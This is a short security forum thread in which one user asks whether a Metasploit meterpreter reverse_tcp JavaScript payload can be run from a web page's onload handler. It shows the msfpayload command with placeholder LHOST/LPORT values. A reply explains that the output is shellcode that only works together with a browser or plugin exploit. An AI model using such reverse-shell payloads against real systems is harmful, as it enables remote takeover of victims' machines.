Embedded Payload (javascript)

[sabotage]

I noticed that msfpayload had a js payload generator, and I was wondering if it was possible to just embed the payload in an onload call within an html page, kinda like so:

First you would generate meterpreter payload and output to javascript [J]

i.e. ./msfpayload windows/meterpreter/reverse_tcp LHOST=000.000.0.0 LPORT=4444 J > meterpreter.js

then open copy generated script source and paste it within exploit page's html like below:


</body onload="meterpreterpayload();">
</body

meterpreterpayload()
{
###pasted js script generated by msfpayload###
}
>

I tried it exactly as mentioned here, and didn't pick up anything on my handler when I opened the page in my test Virtual Machine, but I bet you get the idea. Please let me know if you have any suggestions, or if it's just not that easy...

[lupin]

Nope not that easy. The output from msfpayload is shellcode in Javascript format.

Its essentially machine language instructions, specific to a particular CPU architecture (X86 for the majority of paylods in msfpayload, but there are others) and Operating System. You would use the JS msfpayload option when you are writing an exploit that uses Javascript as part of the process to inject your own code into an already running process.

As an example, I used it here when I wrote my tutorial on using heap spraying to inject shellcode into Internet Explorer via exploitation of a user after free vulnerability.

This type of shellcode is also used in a number of Acrobat exploits I have seen, as Javascript is used to trigger the exploit.

You cant just insert this into a web page and expect it to work. It needs to be used with an exploit of a vulnerability int he browser software (or plugins) itself.